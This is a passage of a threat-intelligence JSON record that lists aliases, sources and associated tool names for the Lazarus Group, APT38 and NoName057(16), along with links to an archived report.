				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b05a0147-3a98-44d3-9b42-90d43f626a8b",
			"created_at": "2023-01-06T13:46:39.467088Z",
			"updated_at": "2026-04-10T02:00:03.33882Z",
			"deleted_at": null,
			"main_name": "NoName057(16)",
			"aliases": [
				"NoName057",
				"NoName05716",
				"05716nnm",
				"Nnm05716"
			],
			"source_name": "MISPGALAXY:NoName057(16)",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439130,
	"ts_updated_at": 1775792116,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/46d06cf61405b37eef9bb5be6a97f900450b51bc.pdf",
		"text": "https://archive.orkl.eu/46d06cf61405b37eef9bb5be6a97f900450b51bc.txt",
		"img": "https://archive.orkl.eu/46d06cf61405b37eef9bb5be6a97f900450b51bc.jpg"
	}
}